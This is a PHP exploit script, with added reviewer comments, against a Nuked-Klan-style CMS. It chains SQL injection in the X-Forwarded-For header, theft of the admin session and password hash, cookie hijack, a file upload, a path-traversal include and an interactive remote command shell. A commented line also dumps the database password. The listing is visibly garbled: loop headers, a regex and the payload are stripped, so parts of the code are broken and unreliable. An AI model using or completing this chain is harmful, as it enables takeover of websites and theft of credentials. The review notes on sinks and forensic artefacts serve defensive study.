# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
# Exploit script against a "nuked"-prefixed CMS install (apparently Nuked-Klan,
# inferred from the table/cookie prefix and the ?file=User / ?file=Admin&page=mysql
# routes used below).  Attack chain as written: SQL injection through the
# X-Forwarded-For header -> harvest an account + its session id -> hijack that
# session with cookies -> upload a file through the user-preferences form ->
# use the admin "upgrade_db" SQL runner to point a block record at the uploaded
# file via path traversal -> interactive command loop.
#
# NOTE(review): this listing was recovered from a collapsed page.  Several "<"
# characters (the comparison in every for-loop header, the preg_match pattern
# after edit_pref) and, most likely, the PHP payload that belonged in $config[4]
# were stripped by HTML extraction.  Read it as a walkthrough of the technique;
# it is not runnable as shown and nothing below is reconstructed.
#
# error_reporting(E_ALL ^ E_NOTICE);
# This file requires the PhpSploit class (HTTP client used for every request).
require("phpsploitclass.php");
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url of the target install (trailing slash expected: paths are appended with '?file=...')
$prx = ''; # proxy :
$pra = ''; # basic authentification
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

# Target-specific knobs.  $config[2] is appended verbatim to the sub-selects
# below, so it chooses which user row is harvested; "ORDER by date LIMIT 1"
# takes the oldest row, presumably the first account created (admin) -- TODO confirm.
$config = array();
$config[] = 'nuked'; # table prefix
$config[] = 'nuked'; # cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # sql conditions
$config[] = 'HAK'; # match, length <= 3 -- marker that brackets each extracted value in the response
$config[] = ''; # NOTE(review): empty here; this is the file body uploaded later as 1.jpg and is presumably where the PHP payload was (stripped)

# Stage 1: SQL injection via the X-Forwarded-For request header.
# Each fragment closes a quoted value, adds a sub-select, and re-opens a quoted
# value; the quote/comma shape suggests the header is interpolated into an
# INSERT value list on the target (not visible here).  The selected value is
# wrapped as <marker><digit> ... <marker><digit> so it can be pulled back out of
# the rendered page with one regex.  Digits: 0 login, 1 password hash, 2 user id,
# 3 session id of that user (from {prefix}_sessions).
$request = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";
# Send one request per fragment, then clear the header so the next one is clean.
# NOTE(review): the loop header and the line building $sql from $request[$i] are
# truncated in this copy ("$i<...; ... $xpl->" was lost).
# Defensive takeaway: X-Forwarded-For is attacker-controlled like any header.
# The "DELETE FROM {prefix}_nbconnecte" cleanup at the end suggests the injected
# header is persisted into the online-users table -- that insert is the sink
# and needs a parameterised query, not header trust.
for($i=0;$iaddheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); }
# Pull the four bracketed values out of the page.  Note \S* stops at whitespace,
# so a login or hash containing spaces would be truncated silently.
if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches)) die("Exploit Failed");
$what = array("login","passwd","user_id","session");
# Print "label => value" for each harvested field (loop header truncated in this copy).
for($i=0;$i ".$matches[2][$i];
# Without a live session id for the harvested user the later admin requests cannot be authenticated.
if(empty($matches[2][3])) exit("\nNo session found");

# Stage 2: session hijack.  The three cookies are named <cookie prefix>_<name>.
# As written, both admin_session and user_id receive the harvested user id
# ($matches[2][2]) and sess_id receives the harvested session id ($matches[2][3]).
# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

# Stage 3: file upload through the user-preferences form.  The multipart field
# 'fichiernom' carries a file named 1.jpg whose content is $config[4] (empty in
# this listing).  The frmdt_* constants are bare identifiers not defined in this
# file; presumably provided by phpsploitclass.php -- confirm.
$phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
# Stage 4: reload the preferences page to learn where the upload landed; $match[1]
# is reused below as the traversal target.
# NOTE(review): the pattern argument is garbled here (it reads "'#\getcontent()"),
# so what exactly is captured into $match[1] cannot be told from this copy.
$xpl->get($url.'?file=User&op=edit_pref');
if(!preg_match('#\getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

# Stage 5: arbitrary SQL through the admin "upgrade_db" page (each statement is
# POSTed as the 'upgrade' parameter).  Order matters:
#   1. widen {prefix}_block.type so a long path fits in it;
#   2. set block bid=1's type to '/../../../' + uploaded path + NUL -- a path
#      traversal back to the uploaded file.  The trailing \x00 presumably
#      truncates whatever suffix the target appends before include() (classic
#      null-byte trick on pre-5.3.4 PHP) -- TODO confirm against the target code;
#   3. wipe {prefix}_nbconnecte, which reads like cleanup of the rows the
#      injected X-Forwarded-For headers created.
# The commented-out UPDATE would have switched avatar uploads on via {prefix}_config.
# IR note: steps 1-2 are persistent artefacts (changed column definition and a
# traversal path stored in the block table) worth checking for on a suspected host.
$sql = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";
# Loop header truncated in this copy; each $sql entry is posted in turn.
for($i=0;$ipost($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);

# Stage 6: interactive loop.  Each command typed on stdin is sent in a custom
# "Shell" request header as system('<cmd>'), and the reply is split on the
# literal delimiter 123456789, printing what sits between the first and second
# occurrence.  This only works if the uploaded payload evaluates the Shell
# header and wraps its output in that delimiter -- not verifiable here because
# $config[4] is empty.  $cmd is interpolated unquoted, so a command containing
# a single quote breaks the system() call.
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) {
    # Author's alternative one-shot payload, left commented: closes the quoted
    # context, includes the CMS config file and prints the database password.
    # 0'); include('./conf.inc.php'); print $global['db_pass']; //
    $xpl->reset('header');
    $xpl->addheader('Shell',"system('$cmd');");
    $xpl->get($url);
    $data = explode('123456789',$xpl->getcontent());
    print $data[1]."\n\$shell> ";
}

# Builds a MySQL CHAR(...) expression for $data so the string can be sent
# without quote characters.  The definition is cut off at the end of this page.
function char($data) {
    $char='CHAR(';
    for($i=0;$i